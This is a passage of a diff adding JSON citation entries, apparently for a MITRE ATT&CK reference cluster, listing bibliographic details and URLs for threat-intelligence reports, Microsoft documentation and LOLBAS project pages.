"a5dd078b-10c7-433d-b7b5-929cf8437413", + "value": "AWS Sec Groups VPC" + }, + { + "description": "Microsoft. (n.d.). Security Identifiers. Retrieved November 30, 2017.", + "meta": { + "date_accessed": "2017-11-30T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/library/windows/desktop/aa379571.aspx" + ], + "source": "MITRE", + "title": "Security Identifiers" + }, + "related": [], + "uuid": "c921c476-741e-4b49-8f94-752984adbba5", + "value": "Microsoft SID" + }, + { + "description": "Schneider Electric. (2018, August 24). Security Notification – USB Removable Media Provided With Conext Combox and Conext Battery Monitor. Retrieved May 28, 2019.", + "meta": { + "date_accessed": "2019-05-28T00:00:00Z", + "date_published": "2018-08-24T00:00:00Z", + "refs": [ + "https://www.se.com/ww/en/download/document/SESN-2018-236-01/" + ], + "source": "MITRE", + "title": "Security Notification – USB Removable Media Provided With Conext Combox and Conext Battery Monitor" + }, + "related": [], + "uuid": "e4d8ce63-8626-4c8f-a437-b6a120ff61c7", + "value": "Schneider Electric USB Malware" + }, + { + "description": "Microsoft. (n.d.). Security Subsystem Architecture. Retrieved November 27, 2017.", + "meta": { + "date_accessed": "2017-11-27T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/library/cc961760.aspx" + ], + "source": "MITRE", + "title": "Security Subsystem Architecture" + }, + "related": [], + "uuid": "27dae010-e3b3-4080-8039-9f89a29607e6", + "value": "Microsoft Security Subsystem" + }, + { + "description": "CISA. (2019, September 27). Security Tip (ST05-016): Understanding Internationalized Domain Names. Retrieved October 20, 2020.", + "meta": { + "date_accessed": "2020-10-20T00:00:00Z", + "date_published": "2019-09-27T00:00:00Z", + "refs": [ + "https://us-cert.cisa.gov/ncas/tips/ST05-016" + ], + "source": "MITRE", + "title": "Security Tip (ST05-016): Understanding Internationalized Domain Names" + }, + "related": [], + "uuid": "3cc2c996-10e9-4e25-999c-21dc2c69e4af", + "value": "CISA IDN ST05-016" + }, + { + "description": "Dr. Nestori Syynimaa. (2017, November 16). Security vulnerability in Azure AD & Office 365 identity federation. Retrieved September 28, 2022.", + "meta": { + "date_accessed": "2022-09-28T00:00:00Z", + "date_published": "2017-11-16T00:00:00Z", + "refs": [ + "https://o365blog.com/post/federation-vulnerability/" + ], + "source": "MITRE", + "title": "Security vulnerability in Azure AD & Office 365 identity federation" + }, + "related": [], + "uuid": "d2005eb6-4da4-4938-97fb-caa0e2381f4e", + "value": "AADInternals zure AD Federated Domain" + }, + { + "description": "Dr. Nestori Syynimaa.. (2017, November 16). Security vulnerability in Azure AD & Office 365 identity federation. Retrieved February 1, 2022.", + "meta": { + "date_accessed": "2022-02-01T00:00:00Z", + "date_published": "2017-11-16T00:00:00Z", + "refs": [ + "https://o365blog.com/post/federation-vulnerability/" + ], + "source": "MITRE", + "title": "Security vulnerability in Azure AD & Office 365 identity federation" + }, + "related": [], + "uuid": "123995be-36f5-4cd6-b80a-d601c2d0971e", + "value": "Azure AD Federation Vulnerability" + }, + { + "description": "ESET Research. (2015, July 10). Sednit APT Group Meets Hacking Team. Retrieved March 1, 2017.", + "meta": { + "date_accessed": "2017-03-01T00:00:00Z", + "date_published": "2015-07-10T00:00:00Z", + "refs": [ + "http://www.welivesecurity.com/2015/07/10/sednit-apt-group-meets-hacking-team/" + ], + "source": "MITRE", + "title": "Sednit APT Group Meets Hacking Team" + }, + "related": [], + "uuid": "e21c39ad-85e5-49b4-8df7-e8890b09c7c1", + "value": "ESET Sednit July 2015" + }, + { + "description": "Calvet, J. (2014, November 11). Sednit Espionage Group Attacking Air-Gapped Networks. Retrieved January 4, 2017.", + "meta": { + "date_accessed": "2017-01-04T00:00:00Z", + "date_published": "2014-11-11T00:00:00Z", + "refs": [ + "http://www.welivesecurity.com/2014/11/11/sednit-espionage-group-attacking-air-gapped-networks/" + ], + "source": "MITRE", + "title": "Sednit Espionage Group Attacking Air-Gapped Networks" + }, + "related": [], + "uuid": "8673f7fc-5b23-432a-a2d8-700ece46bd0f", + "value": "ESET Sednit USBStealer 2014" + }, + { + "description": "ESET. (2017, December 21). Sednit update: How Fancy Bear Spent the Year. Retrieved February 18, 2019.", + "meta": { + "date_accessed": "2019-02-18T00:00:00Z", + "date_published": "2017-12-21T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/" + ], + "source": "MITRE", + "title": "Sednit update: How Fancy Bear Spent the Year" + }, + "related": [], + "uuid": "406e434e-0602-4a08-bbf6-6d72311a720e", + "value": "ESET Sednit 2017 Activity" + }, + { + "description": "ESET. (2018, November 20). Sednit: What’s going on with Zebrocy?. Retrieved February 12, 2019.", + "meta": { + "date_accessed": "2019-02-12T00:00:00Z", + "date_published": "2018-11-20T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2018/11/20/sednit-whats-going-zebrocy/" + ], + "source": "MITRE", + "title": "Sednit: What’s going on with Zebrocy?" + }, + "related": [], + "uuid": "1e503e32-75aa-482b-81d3-ac61e806fa5c", + "value": "ESET Zebrocy Nov 2018" + }, + { + "description": "Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018.", + "meta": { + "date_accessed": "2018-12-14T00:00:00Z", + "date_published": "2018-12-10T00:00:00Z", + "refs": [ + "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group" + ], + "source": "MITRE, Tidal Cyber", + "title": "Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms" + }, + "related": [], + "uuid": "a8e58ef1-91e1-4f93-b2ff-faa7a6365f5d", + "value": "Symantec MuddyWater Dec 2018" + }, + { + "description": "SanDisk. (n.d.). Self-Monitoring, Analysis and Reporting Technology (S.M.A.R.T.). Retrieved October 2, 2018.", + "meta": { + "date_accessed": "2018-10-02T00:00:00Z", + "refs": [ + "" + ], + "source": "MITRE", + "title": "Self-Monitoring, Analysis and Reporting Technology (S.M.A.R.T.)" + }, + "related": [], + "uuid": "578464ff-79d4-4358-9aa6-df8d7063fee1", + "value": "SanDisk SMART" + }, + { + "description": "SELinux Project. (2017, November 30). SELinux Project Wiki. Retrieved December 20, 2017.", + "meta": { + "date_accessed": "2017-12-20T00:00:00Z", + "date_published": "2017-11-30T00:00:00Z", + "refs": [ + "https://selinuxproject.org/page/Main_Page" + ], + "source": "MITRE", + "title": "SELinux Project Wiki" + }, + "related": [], + "uuid": "3b64ce9e-6eec-42ee-bec1-1a8b5420f01d", + "value": "SELinux official" + }, + { + "description": "Microsoft. (n.d.). SendNotifyMessage function. Retrieved December 16, 2017.", + "meta": { + "date_accessed": "2017-12-16T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/library/windows/desktop/ms644953.aspx" + ], + "source": "MITRE", + "title": "SendNotifyMessage function" + }, + "related": [], + "uuid": "c65b3dc8-4129-4c14-b3d1-7fdd1d39ebd5", + "value": "Microsoft SendNotifyMessage function" + }, + { + "description": "The DFIR Report. (2022, May 9). SEO Poisoning – A Gootloader Story. Retrieved September 30, 2022.", + "meta": { + "date_accessed": "2022-09-30T00:00:00Z", + "date_published": "2022-05-09T00:00:00Z", + "refs": [ + "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/" + ], + "source": "MITRE", + "title": "SEO Poisoning – A Gootloader Story" + }, + "related": [], + "uuid": "aa12dc30-ba81-46c5-b412-ca4a01e72d7f", + "value": "DFIR Report Gootloader" + }, + { + "description": "Arntz, P. (2018, May 29). SEO poisoning: Is it worth it?. Retrieved September 30, 2022.", + "meta": { + "date_accessed": "2022-09-30T00:00:00Z", + "date_published": "2018-05-29T00:00:00Z", + "refs": [ + "https://www.malwarebytes.com/blog/news/2018/05/seo-poisoning-is-it-worth-it" + ], + "source": "MITRE", + "title": "SEO poisoning: Is it worth it?" + }, + "related": [], + "uuid": "250b09a2-dd97-4fbf-af2f-618d1f126957", + "value": "MalwareBytes SEO" + }, + { + "description": "Ducklin, P. (2020, October 2). Serious Security: Phishing without links – when phishers bring along their own web pages. Retrieved October 20, 2020.", + "meta": { + "date_accessed": "2020-10-20T00:00:00Z", + "date_published": "2020-10-02T00:00:00Z", + "refs": [ + "https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/" + ], + "source": "MITRE", + "title": "Serious Security: Phishing without links – when phishers bring along their own web pages" + }, + "related": [], + "uuid": "b4aa5bf9-31db-42ee-93e8-a576ecc00b57", + "value": "Sophos Attachment" + }, + { + "description": "Campbell, B. et al. (2022, March 21). Serpent, No Swiping! New Backdoor Targets French Entities with Unique Attack Chain. Retrieved April 11, 2022.", + "meta": { + "date_accessed": "2022-04-11T00:00:00Z", + "date_published": "2022-03-21T00:00:00Z", + "refs": [ + "https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain" + ], + "source": "MITRE", + "title": "Serpent, No Swiping! New Backdoor Targets French Entities with Unique Attack Chain" + }, + "related": [], + "uuid": "c2f7958b-f521-4133-9aeb-c5c8fae23e78", + "value": "ProofPoint Serpent" + }, + { + "description": "Wikipedia. (2017, December 16). Server Message Block. Retrieved December 21, 2017.", + "meta": { + "date_accessed": "2017-12-21T00:00:00Z", + "date_published": "2017-12-16T00:00:00Z", + "refs": [ + "https://en.wikipedia.org/wiki/Server_Message_Block" + ], + "source": "MITRE", + "title": "Server Message Block" + }, + "related": [], + "uuid": "3ea03c65-12e0-4e28-bbdc-17bb8c1e1831", + "value": "Wikipedia Server Message Block" + }, + { + "description": "Wikipedia. (2016, June 12). Server Message Block. Retrieved June 12, 2016.", + "meta": { + "date_accessed": "2016-06-12T00:00:00Z", + "date_published": "2016-06-12T00:00:00Z", + "refs": [ + "https://en.wikipedia.org/wiki/Server_Message_Block" + ], + "source": "MITRE", + "title": "Server Message Block" + }, + "related": [], + "uuid": "087b4779-22d5-4872-adb7-583904a92285", + "value": "Wikipedia SMB" + }, + { + "description": "Schwarz, D. and Proofpoint Staff. (2019, January 9). ServHelper and FlawedGrace - New malware introduced by TA505. Retrieved May 28, 2019.", + "meta": { + "date_accessed": "2019-05-28T00:00:00Z", + "date_published": "2019-01-09T00:00:00Z", + "refs": [ + "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505" + ], + "source": "MITRE", + "title": "ServHelper and FlawedGrace - New malware introduced by TA505" + }, + "related": [], + "uuid": "b744f739-8810-4fb9-96e3-6488f9ed6305", + "value": "Proofpoint TA505 Jan 2019" + }, + { + "description": "Kubernetes. (n.d.). Service Accounts. Retrieved July 14, 2023.", + "meta": { + "date_accessed": "2023-07-14T00:00:00Z", + "refs": [ + "https://kubernetes.io/docs/concepts/security/service-accounts/" + ], + "source": "MITRE", + "title": "Service Accounts" + }, + "related": [], + "uuid": "522eaa6b-0075-5346-bf3c-db1e7820aba2", + "value": "Kubernetes Service Accounts Security" + }, + { + "description": "Microsoft. (2018, May 31). Service Control Manager. Retrieved March 28, 2020.", + "meta": { + "date_accessed": "2020-03-28T00:00:00Z", + "date_published": "2018-05-31T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/windows/win32/services/service-control-manager" + ], + "source": "MITRE", + "title": "Service Control Manager" + }, + "related": [], + "uuid": "00d22c6d-a51a-4107-bf75-53ec3330db92", + "value": "Microsoft Service Control Manager" + }, + { + "description": "Rapid7. (2016, June 22). Service Persistence. Retrieved April 23, 2019.", + "meta": { + "date_accessed": "2019-04-23T00:00:00Z", + "date_published": "2016-06-22T00:00:00Z", + "refs": [ + "https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence" + ], + "source": "MITRE", + "title": "Service Persistence" + }, + "related": [], + "uuid": "75441af3-2ff6-42c8-b7f1-c8dc2c27efe2", + "value": "Rapid7 Service Persistence 22JUNE2016" + }, + { + "description": "Microsoft. (n.d.). Service Principal Names. Retrieved March 22, 2018.", + "meta": { + "date_accessed": "2018-03-22T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/library/ms677949.aspx" + ], + "source": "MITRE", + "title": "Service Principal Names" + }, + "related": [], + "uuid": "985ad31b-c385-473d-978d-40b6cd85268a", + "value": "Microsoft SPN" + }, + { + "description": "Microsoft. (2010, April 13). Service Principal Names (SPNs) SetSPN Syntax (Setspn.exe). Retrieved March 22, 2018.", + "meta": { + "date_accessed": "2018-03-22T00:00:00Z", + "date_published": "2010-04-13T00:00:00Z", + "refs": [ + "https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx" + ], + "source": "MITRE", + "title": "Service Principal Names (SPNs) SetSPN Syntax (Setspn.exe)" + }, + "related": [], + "uuid": "dd5dc432-32de-4bf3-b2c7-0bbdda031dd0", + "value": "Microsoft SetSPN" + }, + { + "description": "The Cyber (@r0wdy_). (2017, November 30). Service Recovery Parameters. Retrieved April 9, 2018.", + "meta": { + "date_accessed": "2018-04-09T00:00:00Z", + "date_published": "2017-11-30T00:00:00Z", + "refs": [ + "https://twitter.com/r0wdy_/status/936365549553991680" + ], + "source": "MITRE", + "title": "Service Recovery Parameters" + }, + "related": [], + "uuid": "8875ff5d-65bc-402a-bfe0-32adc10fb008", + "value": "Twitter Service Recovery Nov 2017" + }, + { + "description": "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved April 9, 2018.", + "meta": { + "date_accessed": "2018-04-09T00:00:00Z", + "date_published": "2017-11-30T00:00:00Z", + "refs": [ + "https://twitter.com/r0wdy_/status/936365549553991680" + ], + "source": "MITRE", + "title": "Service Recovery Parameters" + }, + "related": [], + "uuid": "7757776d-b0e9-4a99-8a55-2cd1b248c4a0", + "value": "Tweet Registry Perms Weakness" + }, + { + "description": "Microsoft. (n.d.). Services. Retrieved June 7, 2016.", + "meta": { + "date_accessed": "2016-06-07T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/library/cc772408.aspx" + ], + "source": "MITRE", + "title": "Services" + }, + "related": [], + "uuid": "b50a3c2e-e997-4af5-8be0-3a8b3a959827", + "value": "TechNet Services" + }, + { + "description": "Brian Krebs. (2012, October 22). Service Sells Access to Fortune 500 Firms. Retrieved March 10, 2023.", + "meta": { + "date_accessed": "2023-03-10T00:00:00Z", + "date_published": "2012-10-22T00:00:00Z", + "refs": [ + "https://krebsonsecurity.com/2012/10/service-sells-access-to-fortune-500-firms/" + ], + "source": "MITRE", + "title": "Service Sells Access to Fortune 500 Firms" + }, + "related": [], + "uuid": "37d237ae-f0a8-5b30-8f97-d751c1560391", + "value": "Krebs Access Brokers Fortune 500" + }, + { + "description": "Hsu, S. (2018, June 30). Session vs Token Based Authentication. Retrieved September 29, 2021.", + "meta": { + "date_accessed": "2021-09-29T00:00:00Z", + "date_published": "2018-06-30T00:00:00Z", + "refs": [ + "https://medium.com/@sherryhsu/session-vs-token-based-authentication-11a6c5ac45e4" + ], + "source": "MITRE", + "title": "Session vs Token Based Authentication" + }, + "related": [], + "uuid": "08b5165c-1c98-4ebc-9f9f-778115e9e06d", + "value": "Medium Authentication Tokens" + }, + { + "description": "Microsoft. (n.d.). Set-InboxRule. Retrieved June 7, 2021.", + "meta": { + "date_accessed": "2021-06-07T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/set-inboxrule?view=exchange-ps" + ], + "source": "MITRE", + "title": "Set-InboxRule" + }, + "related": [], + "uuid": "28cc6142-cc4f-4e63-bcff-94347bc06b37", + "value": "Microsoft Set-InboxRule" + }, + { + "description": "LOLBAS. (2022, October 21). Setres.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2022-10-21T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Setres/" + ], + "source": "Tidal Cyber", + "title": "Setres.exe" + }, + "related": [], + "uuid": "631de0bd-d536-4183-bc5a-25af83bd795a", + "value": "Setres.exe - LOLBAS Project" + }, + { + "description": "Microsoft. (n.d.). Setting Process-Wide Security Through the Registry. Retrieved November 21, 2017.", + "meta": { + "date_accessed": "2017-11-21T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/en-us/library/windows/desktop/ms687317(v=vs.85).aspx" + ], + "source": "MITRE", + "title": "Setting Process-Wide Security Through the Registry" + }, + "related": [], + "uuid": "749d83a9-3c9f-42f4-b5ed-fa775b079716", + "value": "Microsoft Process Wide Com Keys" + }, + { + "description": "LOLBAS. (2021, August 26). SettingSyncHost.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2021-08-26T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/SettingSyncHost/" + ], + "source": "Tidal Cyber", + "title": "SettingSyncHost.exe" + }, + "related": [], + "uuid": "57f573f2-1c9b-4037-8f4d-9ae65d13af94", + "value": "SettingSyncHost.exe - LOLBAS Project" + }, + { + "description": "Daniel Petri. (2009, January 8). Setting up a Logon Script through Active Directory Users and Computers in Windows Server 2008. Retrieved November 15, 2019.", + "meta": { + "date_accessed": "2019-11-15T00:00:00Z", + "date_published": "2009-01-08T00:00:00Z", + "refs": [ + "https://www.petri.com/setting-up-logon-script-through-active-directory-users-computers-windows-server-2008" + ], + "source": "MITRE", + "title": "Setting up a Logon Script through Active Directory Users and Computers in Windows Server 2008" + }, + "related": [], + "uuid": "1de42b0a-3dd6-4f75-bcf3-a2373e349a39", + "value": "Petri Logon Script AD" + }, + { + "description": "AWS. (n.d.). Setting up Run Command. Retrieved March 13, 2023.", + "meta": { + "date_accessed": "2023-03-13T00:00:00Z", + "refs": [ + "https://docs.aws.amazon.com/systems-manager/latest/userguide/run-command-setting-up.html" + ], + "source": "MITRE", + "title": "Setting up Run Command" + }, + "related": [], + "uuid": "9d320336-5be4-5c20-8205-a139376fe648", + "value": "AWS Setting Up Run Command" + }, + { + "description": "Tegan. (2019, August 15). Setting up System Authentication. Retrieved September 20, 2021.", + "meta": { + "date_accessed": "2021-09-20T00:00:00Z", + "date_published": "2019-08-15T00:00:00Z", + "refs": [ + "https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication" + ], + "source": "MITRE", + "title": "Setting up System Authentication" + }, + "related": [], + "uuid": "de6e1202-19aa-41af-8446-521abc20200d", + "value": "VNC Authentication" + }, + { + "description": "Apple Support. (n.d.). Set up a computer running VNC software for Remote Desktop. Retrieved August 18, 2021.", + "meta": { + "date_accessed": "2021-08-18T00:00:00Z", + "refs": [ + "https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac" + ], + "source": "MITRE", + "title": "Set up a computer running VNC software for Remote Desktop" + }, + "related": [], + "uuid": "c1f7fb59-6e61-4a7f-b14d-a3d1d3da45af", + "value": "MacOS VNC software for Remote Desktop" + }, + { + "description": "LOLBAS. (2018, May 25). Setupapi.dll. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Libraries/Setupapi/" + ], + "source": "Tidal Cyber", + "title": "Setupapi.dll" + }, + "related": [], + "uuid": "1a8a1434-fc4a-4c3e-9a9b-fb91692d7efd", + "value": "Setupapi.dll - LOLBAS Project" + }, + { + "description": "Microsoft. (2013, February 22). Set up Recovery Actions to Take Place When a Service Fails. Retrieved April 9, 2018.", + "meta": { + "date_accessed": "2018-04-09T00:00:00Z", + "date_published": "2013-02-22T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc753662(v=ws.11)" + ], + "source": "MITRE", + "title": "Set up Recovery Actions to Take Place When a Service Fails" + }, + "related": [], + "uuid": "6284d130-83e5-4961-a723-af4f9a01c24e", + "value": "Microsoft Service Recovery Feb 2013" + }, + { + "description": "Microsoft. (n.d.). SetWindowLong function. Retrieved December 16, 2017.", + "meta": { + "date_accessed": "2017-12-16T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/library/windows/desktop/ms633591.aspx" + ], + "source": "MITRE", + "title": "SetWindowLong function" + }, + "related": [], + "uuid": "11755d06-a9df-4a19-a165-2995f25c4b12", + "value": "Microsoft SetWindowLong function" + }, + { + "description": "GReAT. (2017, August 15). ShadowPad in corporate networks. Retrieved March 22, 2021.", + "meta": { + "date_accessed": "2021-03-22T00:00:00Z", + "date_published": "2017-08-15T00:00:00Z", + "refs": [ + "https://securelist.com/shadowpad-in-corporate-networks/81432/" + ], + "source": "MITRE", + "title": "ShadowPad in corporate networks" + }, + "related": [], + "uuid": "862877d7-e18c-4613-bdad-0700bf3d45ae", + "value": "Securelist ShadowPad Aug 2017" + }, + { + "description": "Kaspersky Lab. (2017, August). ShadowPad: popular server management software hit in supply chain attack. Retrieved March 22, 2021.", + "meta": { + "date_accessed": "2021-03-22T00:00:00Z", + "date_published": "2017-08-01T00:00:00Z", + "refs": [ + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/08/07172148/ShadowPad_technical_description_PDF.pdf" + ], + "source": "MITRE", + "title": "ShadowPad: popular server management software hit in supply chain attack" + }, + "related": [], + "uuid": "95c9a28d-6056-4f87-9a46-9491318889e2", + "value": "Kaspersky ShadowPad Aug 2017" + }, + { + "description": "Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.", + "meta": { + "date_accessed": "2017-01-11T00:00:00Z", + "date_published": "2016-11-30T00:00:00Z", + "refs": [ + "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/" + ], + "source": "MITRE", + "title": "Shamoon 2: Return of the Disttrack Wiper" + }, + "related": [], + "uuid": "15007a87-a281-41ae-b203-fdafe02a885f", + "value": "Palo Alto Shamoon Nov 2016" + }, + { + "description": "Falcone, R. (2018, December 13). Shamoon 3 Targets Oil and Gas Organization. Retrieved March 14, 2019.", + "meta": { + "date_accessed": "2019-03-14T00:00:00Z", + "date_published": "2018-12-13T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/" + ], + "source": "MITRE", + "title": "Shamoon 3 Targets Oil and Gas Organization" + }, + "related": [], + "uuid": "c2148166-faf4-4ab7-a37e-deae0c88c08d", + "value": "Unit 42 Shamoon3 2018" + }, + { + "description": "Roccia, T., Saavedra-Morales, J., Beek, C.. (2018, December 19). Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems. Retrieved May 29, 2020.", + "meta": { + "date_accessed": "2020-05-29T00:00:00Z", + "date_published": "2018-12-19T00:00:00Z", + "refs": [ + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems/" + ], + "source": "MITRE", + "title": "Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems" + }, + "related": [], + "uuid": "11cb784e-0bfe-4e64-a1ed-56530798f358", + "value": "McAfee Shamoon December19 2018" + }, + { + "description": "Mundo, A., Roccia, T., Saavedra-Morales, J., Beek, C.. (2018, December 14). Shamoon Returns to Wipe Systems in Middle East, Europe . Retrieved May 29, 2020.", + "meta": { + "date_accessed": "2020-05-29T00:00:00Z", + "date_published": "2018-12-14T00:00:00Z", + "refs": [ + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-returns-to-wipe-systems-in-middle-east-europe/" + ], + "source": "MITRE", + "title": "Shamoon Returns to Wipe Systems in Middle East, Europe" + }, + "related": [], + "uuid": "d731f5b4-77a1-4de1-a00a-e2ad918de670", + "value": "McAfee Shamoon December 2018" + }, + { + "description": "Microsoft. (n.d.). Share a Folder or Drive. Retrieved June 30, 2017.", + "meta": { + "date_accessed": "2017-06-30T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/library/cc770880.aspx" + ], + "source": "MITRE", + "title": "Share a Folder or Drive" + }, + "related": [], + "uuid": "80a9b92a-1404-4454-88f0-dd929a12e16f", + "value": "TechNet Shared Folder" + }, + { + "description": "Amazon Web Services. (n.d.). Share an Amazon EBS snapshot. Retrieved March 2, 2022.", + "meta": { + "date_accessed": "2022-03-02T00:00:00Z", + "refs": [ + "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-modifying-snapshot-permissions.html" + ], + "source": "MITRE", + "title": "Share an Amazon EBS snapshot" + }, + "related": [], + "uuid": "6f454218-91b7-4606-9467-c6d465c0fd1f", + "value": "AWS EBS Snapshot Sharing" + }, + { + "description": "Wheeler, D. (2003, April 11). Shared Libraries. Retrieved September 7, 2023.", + "meta": { + "date_accessed": "2023-09-07T00:00:00Z", + "date_published": "2003-04-11T00:00:00Z", + "refs": [ + "https://tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html" + ], + "source": "MITRE", + "title": "Shared Libraries" + }, + "related": [], + "uuid": "054d769a-f88e-55e9-971a-f169ee434cfe", + "value": "Linux Shared Libraries" + }, + { + "description": "The Linux Documentation Project. (n.d.). Shared Libraries. Retrieved January 31, 2020.", + "meta": { + "date_accessed": "2020-01-31T00:00:00Z", + "refs": [ + "https://www.tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html" + ], + "source": "MITRE", + "title": "Shared Libraries" + }, + "related": [], + "uuid": "2862845b-72b3-41d8-aafb-b36e90c6c30a", + "value": "TLDP Shared Libraries" + }, + { + "description": "halflife. (1997, September 1). Shared Library Redirection Techniques. Retrieved December 20, 2017.", + "meta": { + "date_accessed": "2017-12-20T00:00:00Z", + "date_published": "1997-09-01T00:00:00Z", + "refs": [ + "http://phrack.org/issues/51/8.html" + ], + "source": "MITRE", + "title": "Shared Library Redirection Techniques" + }, + "related": [], + "uuid": "9b3f0dc7-d830-43c5-8a5b-ad3c811920c5", + "value": "Phrack halfdead 1997" + }, + { + "description": "Wikipedia. (2017, April 15). Shared resource. Retrieved June 30, 2017.", + "meta": { + "date_accessed": "2017-06-30T00:00:00Z", + "date_published": "2017-04-15T00:00:00Z", + "refs": [ + "https://en.wikipedia.org/wiki/Shared_resource" + ], + "source": "MITRE", + "title": "Shared resource" + }, + "related": [], + "uuid": "6cc6164e-84b3-4413-9895-6719248808fb", + "value": "Wikipedia Shared Resource" + }, + { + "description": "Microsoft. (n.d.). Sharepoint Sharing Events. Retrieved October 8, 2021.", + "meta": { + "date_accessed": "2021-10-08T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events" + ], + "source": "MITRE", + "title": "Sharepoint Sharing Events" + }, + "related": [], + "uuid": "2086d37a-05a8-4604-9c69-75a178406b4a", + "value": "Sharepoint Sharing Events" + }, + { + "description": "HarmJ0y. (2018, August 22). SharpDPAPI - Certificates. Retrieved August 2, 2022.", + "meta": { + "date_accessed": "2022-08-02T00:00:00Z", + "date_published": "2018-08-22T00:00:00Z", + "refs": [ + "https://github.com/GhostPack/SharpDPAPI#certificates" + ], + "source": "MITRE", + "title": "SharpDPAPI - Certificates" + }, + "related": [], + "uuid": "941e214d-4188-4ca0-9ef8-b26aa96373a2", + "value": "GitHub GhostPack Certificates" + }, + { + "description": "LOLBAS. (2018, May 25). Shdocvw.dll. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Libraries/Shdocvw/" + ], + "source": "Tidal Cyber", + "title": "Shdocvw.dll" + }, + "related": [], + "uuid": "0739d5fe-b460-4ed4-be75-cff422643a32", + "value": "Shdocvw.dll - LOLBAS Project" + }, + { + "description": "Kaspersky Lab's Global Research & Analysis Team. (2018, October 04). Shedding Skin – Turla’s Fresh Faces. Retrieved November 7, 2018.", + "meta": { + "date_accessed": "2018-11-07T00:00:00Z", + "date_published": "2018-10-04T00:00:00Z", + "refs": [ + "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/" + ], + "source": "MITRE", + "title": "Shedding Skin – Turla’s Fresh Faces" + }, + "related": [], + "uuid": "5b08ea46-e25d-4df9-9b91-f8e7a1d5f7ee", + "value": "Securelist Turla Oct 2018" + }, + { + "description": "LOLBAS. (2018, May 25). Shell32.dll. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Libraries/Shell32/" + ], + "source": "Tidal Cyber", + "title": "Shell32.dll" + }, + "related": [], + "uuid": "9465358f-e0cc-41f0-a7f9-01d5faca8157", + "value": "Shell32.dll - LOLBAS Project" + }, + { + "description": "Cylance SPEAR Team. (2017, February 9). Shell Crew Variants Continue to Fly Under Big AV’s Radar. Retrieved February 15, 2017.", + "meta": { + "date_accessed": "2017-02-15T00:00:00Z", + "date_published": "2017-02-09T00:00:00Z", + "refs": [ + "https://www.cylance.com/shell-crew-variants-continue-to-fly-under-big-avs-radar" + ], + "source": "MITRE", + "title": "Shell Crew Variants Continue to Fly Under Big AV’s Radar" + }, + "related": [], + "uuid": "c0fe5d29-838b-4e91-bd33-59ab3dbcfbc3", + "value": "Cylance Shell Crew Feb 2017" + }, + { + "description": "Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection Vector. Retrieved December 17, 2020.", + "meta": { + "date_accessed": "2020-12-17T00:00:00Z", + "date_published": "2018-05-31T00:00:00Z", + "refs": [ + "https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html" + ], + "source": "MITRE", + "title": "Shell Logins as a Magento 